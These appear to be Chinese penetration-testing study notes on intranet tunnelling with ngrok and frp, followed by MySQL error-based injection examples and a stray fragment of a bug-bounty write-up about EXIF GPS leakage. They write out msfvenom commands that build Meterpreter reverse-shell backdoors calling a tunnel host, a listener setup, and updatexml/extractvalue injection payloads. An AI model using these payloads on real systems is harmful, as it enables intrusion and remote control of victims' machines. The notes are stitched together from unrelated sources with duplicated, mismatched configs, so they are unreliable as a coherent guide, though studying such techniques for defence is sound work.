9.5-10.9内网横向&代理&隧道

Socks代理思路：

工具：nps、frp、ngrok、reGeorg、sockscap64、earthworm、proxifier、proxychains

知识点

1、内外网简单知识
2、内网1和内网2通信问题
3、正向反向协议通信连接问题
4、内网穿透代理隧道技术说明

代理解决通信问题，隧道解决流量分析、流量监控工具、防火墙等告警

内网穿透Ngrok测试-两个内网通讯

1、注册-购买-填写-确认

2、测试：内网1执行后面门-免费主机处理-内网2监听-内网2接收器(192.168.1.2:4444)

linux版本执行： ./sunny --server=free.idcfengye.com:4443 --key=223256437934

3、生成后门测试

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=lusangtest.free.idcfengye.com LPORT=80 -f exe -o 923.exe

set payload windows/x64/meterpreter/reverse_http

内网穿透-Frp自建跳板测试-两个内网通讯

自行搭建，方便修改，成本低，多样化；

1、服务段-下载-解压-修改-启动（阿里云主机修改安全组配置出入口）

bind_port=6677
启动服务端：
./frps -c ./frps.ini

2、控制端-下载-解压-修改-启动

serverAddr = "x.x.x.x" 云主机ip
serverPort = 6677

[[proxies]] 【msf】
name = "test-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 5555
remotePort = 6000

2.控制端-下载-解压-修改-启动

控制端修改配置文件frpc.ini：

[common]

server_addr = [你的云主机ip]

server_port = 7000         #frpc工作端口，必须和frps保持一致

# frpc.toml
serverAddr = "x.x.x.x"
serverPort = 7000

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "127.0.0.1"
localPort = 22
remotePort = 6000

[msf]

type = tcp

local_ip = 127.0.0.1

local_port = 5555            #转发给本机的5555

remote_port = 6000        #服务端用6000端口转发给本机

启动客户端：

./frpc -c ./frpc.ini

生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=6000 -f exe -o frp.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=6000 -f exe -o frp.exe

监听后门

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 127.0.0.1

set LPORT 5555

exploit

3.靶机运行frp即可 作者：shtome https://www.bilibili.com/read/cv15055303/?spm_id_from=333.999.0.0 出处：bilibili

执行木马得到会话；

三层内网穿透

报错注入

updatexm()函数

作用：使用不同xml标记匹配和替换xml块的函数，改变文档中符合条件节点值;
语法：udatexml(XML_document,XPath_string,new_value),即（string格式 xml对象名称，路径，string格式 替换查找到的符合条件的数据）

使用时，xpath_string格式错误时，mysql会报出xpath syntax语法错误；

例：select *from test where ide=1 and (updatexml(1,0x7e,3));由于0x7e不属于xpath格式，故报语法错误；

extractvalue()函数

作用：此函数从目标XML中返回包含所查询值的字符串；
语法：extractvalue(XML_document,xpath_string); 即（string格式 ，路径）

例：select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));xpath格式错误即会报错；
concat()函数表示拼接两个字符串；

GPS 位置数据的图像

但我注意到我的payload没有改变，这意味着如果我上传一张图片，图片中的所有元数据都不会改变

好吧，是时候射出最后一颗子弹了

所以我上传了包含 GPS 位置数据的图像

你可以在这里找到它

代码语言：javascript
复制
https://github.com/ianare/exif-samples/blob/master/jpg/tests/67-0_length_string.jpg
将图像上传到 Web 应用程序后，我再次下载它以检查地理位置数据是否被条带化

我们可以使用 ExifTool 进行检查以提取元数据

代码语言：javascript
复制
┌──(omar㉿kali)-[~/Downloads] └─$ exiftool /Downloads/exif-test.jpg

看起来网络应用程序没有从图像中剥离地理位置数据

提交漏洞后，安全团队接受其为P2，原因是教育平台的大多数用户都是未成年学生，这种信息泄露侵犯了他们的隐私

涉及资源：

Sunny-Ngrok（也提供FRP）：http://www.ngrok.cc/

了解如何部署、使用frp：https://gofrp.org/docs/

frp：https://github.com/fatedier/frp

CFS三层靶机环境：https://pan.baidu.com/s/1l5-TOVe9FO8mEjCiZ4mtMQ 提取码：xiao 作者：shtome https://www.bilibili.com/read/cv15055303/?spm_id_from=333.999.0.0 出处：bilibili
批量sql思路：https://blog.csdn.net/web22050702/article/details/139233318
sql地区、范围、行业思路：https://www.pianshen.com/article/61202470170/